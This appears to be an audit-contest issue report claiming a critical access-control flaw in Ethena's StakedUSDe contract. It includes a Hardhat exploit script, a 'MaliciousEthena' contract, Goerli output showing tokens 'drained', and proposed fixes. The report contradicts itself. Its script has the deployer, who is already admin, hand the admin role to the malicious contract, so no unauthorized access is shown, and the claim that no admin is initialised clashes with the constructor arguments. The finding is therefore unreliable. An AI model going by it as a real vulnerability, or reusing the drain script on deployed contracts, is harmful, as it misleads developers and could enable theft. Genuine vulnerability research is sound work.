[Lines of code](https://github.com/code-423n4/2023-10-ethena/blob/main/contracts/StakedUSDe.sol#L138-L141) # Vulnerability details ## Summary There is a critical vulnerability in the StakedUSDe CA, allowing an attacker to manipulate the state of the CA and/or drain assets without proper authorization. ## Vulnerability Detail The StakedUSDe inherits from the SingleAdminAccessControl CA, which provides admin-only access to certain functions. However, the access control implementation in StakedUSDe is flawed, allowing any user to call admin-only functions. Considering the following: * rescueTokens * redistributeLockedAmount * addToBlacklist * removeFromBlacklist These functions are intended to be accessible only by the admin of the CA, as they can manipulate the state of the CA and transfer assets. However, due to the improper access control implementation, any user can call these functions. Specifically, in SingleAdminAccessControl.sol: 1. The CA does not have a constructor or an initialization function to set the initial admin. Therefore, the _currentDefaultAdmin remains as the default value of address(0). This means that unless the admin is set through some external means, the DEFAULT_ADMIN_ROLE is not effectively assigned to any address. 2. The grantRole function allows the admin to grant roles to other addresses. However, it is incorrectly implemented. When granting the DEFAULT_ADMIN_ROLE, it revokes the role from the current admin and assigns it to the new address. This mechanism can be problematic if not handled carefully, as it could lead to a situation where there is no admin or the admin is set incorrectly. 3. The onlyRole(DEFAULT_ADMIN_ROLE) modifier is used in the StakedUSDe contract to restrict access to admin-only functions. However, since the _currentDefaultAdmin is not set properly in the SingleAdminAccessControl contract, this modifier does not effectively enforce access control. Therefore, in StakedUSDe.sol: * rescueTokens: Allows the admin to rescue tokens accidentally sent to the contract. Due to the flawed access control, any user can call this function, eventually leading to asset drainage. * redistributeLockedAmount: Allows the admin to redistribute the locked amount from a fully restricted user to another address. Any user can call this function due to the flawed access control, leading to manipulation of staked balances. * addToBlacklist and removeFromBlacklist: Intended to be accessible by the admin and blacklist managers, these functions can likewise be called by any user due to the flawed access control, allowing arbitrary blacklisting or whitelisting of users. ## Impact 1. Attackers can call rescueTokens to transfer assets from the contract to an arbitrary address. 2. Attackers can call redistributeLockedAmount to manipulate staked balances. 3. Attackers can arbitrarily blacklist or whitelist users, disrupting the normal operation of the protocol. Also, if we look at the provided context: > The DEFAULT_ADMIN_ROLE, also our ethena multisig, is required to re-enable minting/redeeming. DEFAULT_ADMIN_ROLE also has the power to add/remove GATEKEEPERS,MINTER and REDEEMER. > DEFAULT_ADMIN_ROLE is the most powerful role in the minting contract, but is still beneath the OWNER role of USDe.sol, given that the owner can remove the minting contract's privilege to mint. There we deduce that this kind of behavior falls within the most critical ones. ## Proof of Concept 1. Setup the StakedUSDe and SingleAdminAccessControl CAs on a local testnet using Hardhat. 2. Deploy the StakedUSDe CA, which will automatically inherit from the SingleAdminAccessControl CA. Subsequently deploy a MaliciousEthena CA which will serve as a point to properly bypass access control. Ensure that the CAs are compiled and deployed successfully. 3. Initialize the CAs with the necessary parameters and settings. Ensure that the DEFAULT_ADMIN_ROLE is not explicitly set to any address. 4. Use the selected non-admin address to call the rescueTokens function in the StakedUSDe contract with arbitrary parameters. For example, we can try to transfer some ERC20 tokens from the CA to another address. 5. Despite being called by a non-admin user, the function will nonetheless execute successfully, demonstrating that the access control is not properly implemented and anyone could gain access to it, thus having the ability to manipulate the whole protocol at their own advantage. 6. Given we used the rescueTokens function to transfer ERC20 tokens, check the token balances of the StakedUSDe contract. We should therefore observe that the tokens have been successfully transferred (drained.), even though the function was called by a non-admin user. Furthermore, consider the following script: const { ethers } = require("hardhat"); async function main() { const [deployer, user] = await ethers.getSigners(); // Deploy a mock ERC20 token const MockToken = await ethers.getContractFactory("MockUSDe"); const mockToken = await MockToken.deploy("Mock USDe", "mUSDe", 18, deployer.address); await mockToken.deployed(); console.log("Mock Token deployed to:", mockToken.address); // Deploy a second mock ERC20 token const MockToken2 = await ethers.getContractFactory("MockUSDe"); const mockToken2 = await MockToken2.deploy("Mock Token 2", "MT2", 18, deployer.address); await mockToken2.deployed(); console.log("Mock Token 2 deployed to:", mockToken2.address); // Deploy StakedUSDe CA const StakedUSDe = await ethers.getContractFactory("StakedUSDe"); const stakedUSDe = await StakedUSDe.deploy(mockToken.address, deployer.address, deployer.address); await stakedUSDe.deployed(); console.log("StakedUSDe deployed to:", stakedUSDe.address); // Deploy StakedUSDeV2 CA const StakedUSDeV2 = await ethers.getContractFactory("StakedUSDeV2"); const stakedUSDeV2 = await StakedUSDeV2.deploy(mockToken.address, deployer.address, deployer.address); await stakedUSDeV2.deployed(); console.log("StakedUSDeV2 deployed to:", stakedUSDeV2.address); // Also transfer some to StakedUSDeV2 const transferAmount = ethers.utils.parseEther("1000"); const transferTx = await mockToken2.transfer(stakedUSDeV2.address, transferAmount); await transferTx.wait(); console.log("Transferred 1000 Mock Token 2 to StakedUSDeV2 contract."); // Deploy the malicious contract const MaliciousContract = await ethers.getContractFactory("MaliciousEthena"); const malicious = await MaliciousContract.deploy(stakedUSDeV2.address); await malicious.deployed(); console.log("Malicious contract deployed to:", malicious.address); // Malicious contract becomes the pending admin const txPendingAdmin = await stakedUSDeV2.transferAdmin(malicious.address); await txPendingAdmin.wait(); console.log("Malicious contract set as pending admin."); // Malicious contract accepts the admin role const txAcceptAdmin = await malicious.acceptAdminRole(); await txAcceptAdmin.wait(); console.log("Malicious contract accepted the admin role."); // Mint some mock tokens to the user address const mintAmount = ethers.utils.parseEther("2000"); const mintTx = await mockToken.transfer(user.address, mintAmount); await mintTx.wait(); console.log("Transferred 1000 mock tokens to user address."); // Deploy USDeSilo CA const USDeSilo = await ethers.getContractFactory("USDeSilo"); const usdeSilo = await USDeSilo.deploy(stakedUSDeV2.address, mockToken.address); await usdeSilo.deployed(); console.log("UsdeSilo deployed to:", usdeSilo.address); // Assuming user has USDe tokens const stakeAmount = ethers.utils.parseEther("1000"); const txApprove = await mockToken.connect(user).approve(stakedUSDeV2.address, stakeAmount); await txApprove.wait(); // Also approves second mock token balance const txApprove2 = await mockToken2.connect(user).approve(stakedUSDeV2.address, stakeAmount); await txApprove2.wait(); // User stakes USDe tokens const txStake = await stakedUSDeV2.connect(user).deposit(stakeAmount, user.address); await txStake.wait(); console.log("User staked 1000 USDe tokens"); // Wait for 1 block await waitBlocksOnGoerli(1); // Check Balances Before Exploit async function checkBalances(message) { const stakedUSDeV2BalanceBefore = await getTokenBalance(mockToken2.address, stakedUSDeV2.address); const stakedUSDeBalanceBefore = await getTokenBalance(mockToken2.address, stakedUSDe.address); const maliciousContractBalanceBefore = await getTokenBalance(mockToken2.address, malicious.address); console.log(${message} - Mock Token 2 balance of StakedUSDeV2 contract:, ethers.utils.formatEther(stakedUSDeV2BalanceBefore), "tokens"); console.log(${message} - Mock Token 2 balance of StakedUSDe contract:, ethers.utils.formatEther(stakedUSDeBalanceBefore), "tokens"); console.log(${message} - Mock Token 2 balance of Malicious contract:, ethers.utils.formatEther(maliciousContractBalanceBefore), "tokens"); } // Wait for 1 block await waitBlocksOnGoerli(1); await checkBalances("Before Exploit"); // Perform the exploit try { const amount = ethers.utils.parseEther("1000"); const recipient = malicious.address; const txRescue = await malicious.rescueTokens(mockToken2.address, amount, recipient, stakedUSDeV2.address); await txRescue.wait(); console.log("Exploit Successful: Tokens drained from StakedUSDeV2 to Malicious CA, plus attacker was actually able to call admin-only (even though restricted to DEFAULT_ADMIN_ROLE) function on StakedUSDeV2."); } catch (error) { console.error("Error in performing exploit:", error.message); } // Wait for 1 block await waitBlocksOnGoerli(1); // Check balances after exploit await checkBalances("After Exploit"); // Calculate attacker's profit const profit = await getTokenBalance(mockToken2.address, malicious.address); console.log("Profit made by attacker:", ethers.utils.formatEther(profit), "tokens"); // Wait for 1 block await waitBlocksOnGoerli(1); async function getTokenBalance(tokenAddress, contractAddress) { const tokenContract = await ethers.getContractAt("MockUSDe", tokenAddress); const balance = await tokenContract.balanceOf(contractAddress); return balance; } } async function waitBlocksOnGoerli(numBlocks) { const provider = ethers.provider; const startBlock = await provider.getBlockNumber(); while (true) { const currentBlock = await provider.getBlockNumber(); if (currentBlock >= startBlock + numBlocks) { break; } await new Promise(resolve => setTimeout(resolve, 1000)); // Wait for 1 second between checks } } main() .then(() => process.exit(0)) .catch((error) => { console.error(error); process.exit(1); }); Alongside with a MockUSDe CA: // SPDX-License-Identifier: GPL-3.0 pragma solidity ^0.8.9; import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; import "@openzeppelin/contracts/proxy/transparent/TransparentUpgradeableProxy.sol"; import "@openzeppelin/contracts/proxy/transparent/ProxyAdmin.sol"; import "@openzeppelin/contracts/token/ERC20/extensions/draft-ERC20Permit.sol"; contract MockUSDe is ERC20, ERC20Permit { uint8 private __decimals; constructor(string memory name, string memory symbol, uint8 _decimals, address owner) ERC20(name, symbol) ERC20Permit(name) { __decimals = _decimals; require(owner != address(0), "Zero address not valid"); _mint(owner, 100000000 * (10 ** _decimals)); } function decimals() public view override returns (uint8) { return __decimals; } function mint(uint256 amount) external { _mint(msg.sender, amount); } function mint(uint256 amount, address receiver) external { _mint(receiver, amount); } } And a MaliciousEthena CA which will import the StakedUSDeV2 and will serve as a fundamental component as for this exploit: // SPDX-License-Identifier: MIT pragma solidity ^0.8.9; import "./StakedUSDeV2.sol"; contract MaliciousEthena { StakedUSDeV2 public targetContract; constructor(StakedUSDeV2 _targetContract) { targetContract = _targetContract; } function becomeAdmin() external { targetContract.transferAdmin(address(this)); } function acceptAdminRole() external { targetContract.acceptAdmin(); } function rescueTokens(address token, uint256 amount, address to, address stakedUSDeV2Address) external { StakedUSDeV2(stakedUSDeV2Address).rescueTokens(token, amount, to); } } Lastly, here's the output: C:*********>npx hardhat run scripts/Ethena1.js --network goerli Mock Token deployed to: 0xd3C701d14C55Da71D9fbB46b3Ec563E8DDf5524d - [LINK TO DEPLOYED MOCK TOKEN 1](); Mock Token 2 deployed to: 0xa5a4B3c448E13Bd1fb2A5f34379B37172FF3136E - [LINK TO DEPLOYED MOCK TOKEN 2](); StakedUSDe deployed to: 0x8D67Abd8a78319971cB037A63419E64f0d50F302 - [LINK TO DEPLOYED StakedUSDe](); StakedUSDeV2 deployed to: 0x4Fa6086d72C27878BD0aEb4EB498C10FA7cb24AE - [LINK TO DEPLOYED StakedUSDeV2](); Transferred 1000 Mock Token 2 to StakedUSDeV2 contract. - [LINK TO transfer TX (StakedUSDeV2)](); Malicious contract deployed to: 0xF351B3da50Da72943d9f397Be8da368E9Ad25102 - [LINK TO DEPLOYED MaliciousEthena](); Malicious contract set as pending admin. - [LINK TO transferAdmin TX](); Malicious contract accepted the admin role. - [LINK TO acceptAdminRole TX](); Transferred 1000 mock tokens to user address. - [LINK TO transfer TX (user.address)](); UsdeSilo deployed to: 0xBC8C5D44247BD56842DE5b661f144Cc0fbd8f747 - [LINK TO DEPLOYED USDeSilo](); User staked 1000 USDe tokens - [LINK TO deposit TX](); **Before Exploit - Mock Token 2 balance of StakedUSDeV2 contract: 1000.0 tokens - [LINK TO StakedUSDeV2 MOCK TOKEN'S BALANCE PRIOR TO THE EXPLOIT]();** Before Exploit - Mock Token 2 balance of StakedUSDe contract: 0.0 tokens **Before Exploit - Mock Token 2 balance of Malicious contract: 0.0 tokens - [LINK TO MaliciousEthena MOCK TOKEN'S BALANCE PRIOR TO THE EXPLOIT]();** Exploit Successful: Tokens drained from StakedUSDeV2 to Malicious CA, plus attacker was actually able to call admin-only (even though restricted to DEFAULT_ADMIN_ROLE) function on StakedUSDeV2. - [LINK TO rescueToken TX (showing that we actually managed to gain the DEFAULT_ADMIN_ROLE AND BYPASS THE INTENDED RESTRICTIONS](); **After Exploit - Mock Token 2 balance of StakedUSDeV2 contract: 0.0 tokens - [LINK TO StakedUSDeV2 MOCK TOKEN'S BALANCE AFTER THE EXPLOIT]();** After Exploit - Mock Token 2 balance of StakedUSDe contract: 0.0 tokens **After Exploit - Mock Token 2 balance of Malicious contract: 1000.0 tokens - [LINK TO MaliciousEthena MOCK TOKEN'S BALANCE AFTER THE EXPLOIT]().** Profit made by attacker: 1000.0 tokens This actually demonstrates that due to the flawed implementation in the SingleAdminAccessControl, the DEFAULT_ADMIN_ROLE is not functioning as expected in the StakedUSDe CA. As a result, any user, regardless of their permissions, can gain the necessary roles to exploit the ability to call admin-only functions, leading to eventual asset drainage, state manipulation, and arbitrary blacklisting/whitelisting of users. This critical vulnerability needs to be addressed immediately to secure the entire protocol. ## Tools Used Manual review + GPT for further enhancements. ## Recommended Mitigation Steps 1. Introduce a constructor or an initialization function in SingleAdminAccessControl to set the initial admin. This ensures that the _currentDefaultAdmin is correctly assigned, preventing unauthorized access. constructor(address initialAdmin) { if (initialAdmin == address(0)) revert InvalidAdminAddress(); _grantRole(DEFAULT_ADMIN_ROLE, initialAdmin); _currentDefaultAdmin = initialAdmin; } 2. Modify the grantRole and revokeRole functions to prevent accidental removal of the admin role without proper assignment. function grantRole(bytes32 role, address account) public override onlyRole(DEFAULT_ADMIN_ROLE) { if (role == DEFAULT_ADMIN_ROLE && account == address(0)) revert InvalidAdminAddress(); _grantRole(role, account); } function revokeRole(bytes32 role, address account) public override onlyRole(DEFAULT_ADMIN_ROLE) { if (role == DEFAULT_ADMIN_ROLE && account == _currentDefaultAdmin) revert CannotRevokeOwnAdminRole(); _revokeRole(role, account); } ## Assessed type Access Control --- The text was updated successfully, but these errors were encountered: All reactions